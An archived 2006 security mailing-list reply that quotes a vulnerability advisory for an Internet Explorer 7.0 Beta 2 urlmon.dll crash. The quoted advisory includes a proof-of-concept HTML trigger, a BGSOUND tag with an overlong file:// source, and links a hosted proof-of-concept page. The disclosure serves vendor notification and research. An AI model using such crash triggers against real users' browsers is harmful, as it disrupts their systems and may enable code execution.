funsec mailing list archives

Re: Internet Explorer 7.0 Beta 2 urlmon.dll DoS

From: Dave Aitel <dave.aitel () gmail com>
Date: Thu, 2 Feb 2006 19:48:59 -0500

I like your workaround. I guess my question is: why is your fuzzer so much
better than theirs? What kind of bug is this, and how did it slip by?

-dave


On 2/1/06, Tom Ferris <tommy () security-protocols com> wrote:


Internet Explorer 7.0 Beta 2 urlmon.dll DoS

Release Date:
Jan 31, 2006

Severity:
Medium

Vendor:
Microsoft

Versions Affected:
Internet Explorer 7.0 Beta 2 (7.0.5296.0)

Overview:
A denial of service vulnerability exists within Microsoft Internet
Explorer 7.0 Beta 2 which allows for an attacker to cause the browser to
crash, and or to execute arbitrary code on the targeted host.

Technical Details:
When running a specially crafted .html file, urlmon.dll
inproperly parsers the 'BGSOUND SRC=file://---' (approx. 344 dashes) and
causes the crash.

The following html code will trigger the crash:

<BGSOUND

SRC=file://---------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
---------------------------------- >

or hit the following url:

http://www.security-protocols.com/poc/sp-x23.html

Vendor Status:
Microsoft was notified.

Workaround:
Mozilla Firefox

Discovered by:
Tom Ferris
<tommy[at]security-protocols[dot]com>

Related Links:
http://www.security-protocols.com/advisory/sp-x23.txt
http://security-protocols.com/modules.php?name=News&file=article&sid=3169
http://www.microsoft.com/windows/IE/ie7/ie7betaredirect.mspx

Copyright (c) 2006 Security-Protocols.com

-----

Tom Ferris
Researcher
www.security-protocols.com
Key fingerprint = 0DFA 6275 BA05 0380 DD91  34AD C909 A338 D1AF 5D78
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

Current thread:

Internet Explorer 7.0 Beta 2 urlmon.dll DoS Tom Ferris (Feb 02)
- Re: Internet Explorer 7.0 Beta 2 urlmon.dll DoS Dave Aitel (Feb 02)